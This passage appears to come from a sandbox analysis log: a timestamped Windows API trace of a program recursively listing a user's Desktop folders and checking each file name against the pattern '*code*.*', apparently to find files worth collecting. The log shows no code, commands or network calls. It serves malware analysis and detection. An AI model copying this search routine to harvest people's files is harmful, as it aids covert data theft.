(in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b28 | out: hHeap=0x29a0000) returned 1 [0110.935] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQEQQujqhNYM", cAlternateFileName="UQEQQU~1")) returned 1 [0110.935] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.935] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.935] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.935] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.935] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.935] lstrcatW (in: lpString1="\\KTOu\\", lpString2="UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.935] lstrcmpW (lpString1="UQEQQujqhNYM", lpString2=".") returned 1 [0110.935] lstrcmpW (lpString1="UQEQQujqhNYM", lpString2="..") returned 1 [0110.935] lstrcpyW (in: lpString1=0x19bf40, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.935] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*" [0110.935] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743960 [0110.936] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.936] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.936] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\." [0110.936] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.936] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.936] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="." | out: lpString1="\\KTOu\\UQEQQujqhNYM\\.") returned="\\KTOu\\UQEQQujqhNYM\\." [0110.936] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.936] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.936] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.936] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.936] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\.." [0110.936] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.936] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.936] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2=".." | out: lpString1="\\KTOu\\UQEQQujqhNYM\\..") returned="\\KTOu\\UQEQQujqhNYM\\.." [0110.936] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.936] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.936] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13220d0, ftCreationTime.dwHighDateTime=0x1d79ffb, ftLastAccessTime.dwLowDateTime=0xb8ee8eb0, ftLastAccessTime.dwHighDateTime=0x1d7a126, ftLastWriteTime.dwLowDateTime=0xb8ee8eb0, ftLastWriteTime.dwHighDateTime=0x1d7a126, nFileSizeHigh=0x0, nFileSizeLow=0x16d3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LlE7.doc", cAlternateFileName="")) returned 1 [0110.936] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.936] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.936] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="LlE7.doc" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc" [0110.936] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.936] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.936] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="LlE7.doc" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\LlE7.doc") returned="\\KTOu\\UQEQQujqhNYM\\LlE7.doc" [0110.936] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.936] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a27c8 [0110.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x29a27c8, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", lpUsedDefaultChar=0x0) returned 58 [0110.937] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d68 [0110.937] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a27c8 | out: hHeap=0x29a0000) returned 1 [0110.937] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.937] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970e40 [0110.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970e40, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.937] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.937] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.937] PathMatchSpecW (pszFile="LlE7.doc", pszSpec="*code*.*") returned 0 [0110.937] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970588 | out: hHeap=0x29a0000) returned 1 [0110.937] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d68 | out: hHeap=0x29a0000) returned 1 [0110.937] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4773fc0, ftCreationTime.dwHighDateTime=0x1d7ab51, ftLastAccessTime.dwLowDateTime=0xfbe70ad0, ftLastAccessTime.dwHighDateTime=0x1d7ab5d, ftLastWriteTime.dwLowDateTime=0xfbe70ad0, ftLastWriteTime.dwHighDateTime=0x1d7ab5d, nFileSizeHigh=0x0, nFileSizeLow=0x1566b, dwReserved0=0x0, dwReserved1=0x0, cFileName="s ICeshe.bmp", cAlternateFileName="SICESH~1.BMP")) returned 1 [0110.937] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.937] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.937] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="s ICeshe.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp" [0110.937] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.937] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.937] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="s ICeshe.bmp" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp") returned="\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp" [0110.937] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.937] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3e) returned 0x29a2c90 [0110.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x29a2c90, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", lpUsedDefaultChar=0x0) returned 62 [0110.937] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a29c0 [0110.937] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c90 | out: hHeap=0x29a0000) returned 1 [0110.937] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.937] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ec0 [0110.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970ec0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.937] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.938] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ec0 | out: hHeap=0x29a0000) returned 1 [0110.938] PathMatchSpecW (pszFile="s ICeshe.bmp", pszSpec="*code*.*") returned 0 [0110.938] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.938] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0110.938] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 1 [0110.938] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.938] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.938] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="sQpxS.csv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv" [0110.938] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.938] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.938] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="sQpxS.csv" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\sQpxS.csv") returned="\\KTOu\\UQEQQujqhNYM\\sQpxS.csv" [0110.938] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.938] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2978 [0110.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x29a2978, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", lpUsedDefaultChar=0x0) returned 59 [0110.938] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a27c8 [0110.938] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2978 | out: hHeap=0x29a0000) returned 1 [0110.938] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.938] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970c20 [0110.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970c20, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.938] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.938] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c20 | out: hHeap=0x29a0000) returned 1 [0110.938] PathMatchSpecW (pszFile="sQpxS.csv", pszSpec="*code*.*") returned 0 [0110.938] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.938] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a27c8 | out: hHeap=0x29a0000) returned 1 [0110.938] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 0 [0110.938] FindClose (in: hFindFile=0x743960 | out: hFindFile=0x743960) returned 1 [0110.939] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.939] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea218 [0110.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x38ea218, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpUsedDefaultChar=0x0) returned 49 [0110.939] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2bb8 [0110.939] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea218 | out: hHeap=0x29a0000) returned 1 [0110.939] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.939] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ea0 [0110.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970ea0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.939] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970448 [0110.939] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ea0 | out: hHeap=0x29a0000) returned 1 [0110.939] PathMatchSpecW (pszFile="UQEQQujqhNYM", pszSpec="*code*.*") returned 0 [0110.939] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 1 [0110.939] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.939] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.939] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.939] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.939] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.939] lstrcatW (in: lpString1="\\KTOu\\", lpString2="_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.939] lstrcmpW (lpString1="_5VgSE0-6jvrM", lpString2=".") returned 1 [0110.939] lstrcmpW (lpString1="_5VgSE0-6jvrM", lpString2="..") returned 1 [0110.939] lstrcpyW (in: lpString1=0x19bf40, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.939] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*") 